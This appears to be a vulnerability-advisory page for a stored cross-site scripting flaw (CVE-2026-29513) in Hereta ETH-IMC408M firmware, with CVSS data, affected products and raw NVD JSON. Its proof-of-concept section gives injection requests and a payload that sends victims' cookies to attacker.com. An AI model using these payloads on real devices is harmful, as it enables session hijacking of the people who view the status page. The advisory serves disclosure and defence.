Security Vulnerability Report
CVE-2026-29513 CVSS 5.4 MEDIUM

CVE-2026-29513

Published: 2026-03-16 18:16:08
Last Modified: 2026-04-10 17:44:34

Description

Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a stored cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by manipulating the Device Location field. Because the field is not sanitized, scripts injected through the System Status interface execute in the browsers of users who view the status page.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Hereta ETH-IMC408M firmware <= 1.0.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-29513 PoC - Stored XSS in Hereta ETH-IMC408M Device Location Field
// Target: Hereta ETH-IMC408M firmware <= 1.0.15
// Attack Vector: Inject JavaScript via Device Location field in System Status interface

// Step 1: Authenticate with low-privilege account
// POST /login HTTP/1.1
// username=attacker&password=password123

// Step 2: Inject XSS payload in Device Location field
// POST /api/device/location HTTP/1.1
// {"location": "<script>alert(document.cookie)</script>"}

// Alternative payload for session hijacking:
const xssPayload = `
<img src=x onerror="
  fetch('https://attacker.com/steal?cookie='+document.cookie)
">
`;

// Step 3: Wait for victim to view System Status page
// When victim visits the page, XSS payload executes in their browser context

// Metasploit module reference:
// https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2026-29513

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29513", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:08.190", "lastModified": "2026-04-10T17:44:34.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a stored cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by manipulating the Device Location field. Attackers can inject malicious scripts through the System Status interface that execute in browsers of users viewing the status page without input sanitation."}, {"lang": "es", "value": "Hereta ETH-IMC408M firmware versión 1.0.15 y anteriores contienen una vulnerabilidad de cross-site scripting almacenado que permite a atacantes autenticados inyectar JavaScript arbitrario manipulando el campo Device Location. Los atacantes pueden inyectar scripts maliciosos a través de la interfaz System Status que se ejecutan en los navegadores de los usuarios que ven la página de estado sin saneamiento de entrada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": 
"NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.15", "matchCriteriaId": "9E114378-9A8F-4EC3-A7B3-89DF7D6BBEC0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D3C670E1-A5ED-4FC7-8150-0B62411371F9"}]}]}], "references": [{"url": "https://web.archive.org/web/20250820105319/http://hereta.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/hereta-eth-imc408m-stored-xss-via-device-location", "source": "[email protected]", "tags": 
["Third Party Advisory"]}]}}